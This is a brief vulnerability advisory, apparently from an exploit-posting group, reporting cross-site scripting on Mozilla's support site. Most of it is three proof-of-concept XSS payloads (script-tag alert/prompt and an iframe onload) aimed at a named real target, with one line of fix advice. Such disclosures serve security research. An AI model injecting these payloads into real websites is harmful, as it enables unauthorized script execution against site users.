<------------------ header data start ------------------- >

#############################################################

# Application Name : Mozilla XSS Vuln.

# Vulnerable Type : Cross-Site Scripting

# Bug Fix Advice : Harmful characters can be filtered out.

# Vendor Homepage : https://www.mozilla.org/en-US/firefox/new/

# Author : Cyber Warrior | Bug Researchers Group | AaCcTt

# Author Contact : http://www.Cyber-warrior.org/198620

# Target : https://support.mozilla.org/

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

><script>alert(CWBUGRESEARCHERSAaCcTt)</script>

></script><script>prompt(CWBUGRESEARCHERSAaCcTt)</script>

><iframe onload=alert(/CWBUGRESEARCHERSAaCcTt/)>

< -- / bug code end of -- >